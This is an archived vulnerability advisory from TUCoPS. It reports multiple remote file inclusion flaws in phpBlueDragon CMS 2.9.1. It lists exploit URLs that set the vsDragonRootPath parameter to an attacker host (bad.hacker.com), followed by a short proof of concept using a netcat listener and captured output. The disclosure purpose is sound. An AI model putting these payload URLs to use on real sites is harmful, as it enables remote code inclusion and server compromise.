Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-3249.htm

phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln



phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln
phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln



PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/=0D 
=0D
Affected files:=0D
root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/=0D 
=0D
Solution:=0D
=0D
None=0D
=0D
Simple PoC:=0D
=0D
nc -l -p 9999=0D
...=0D
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/=0D 
...=0D
$ nc -l -p 9999=0D
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0=0D
Host: 192.168.0.xx:9999=0D
=0D
HTTP/0.9 200 OK=0D
=0D
=0D
...=0D
System 	OpenBSD xxx 3.9 xxx i386=0D
... =0D
=0D
Credits:=0D
shm 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH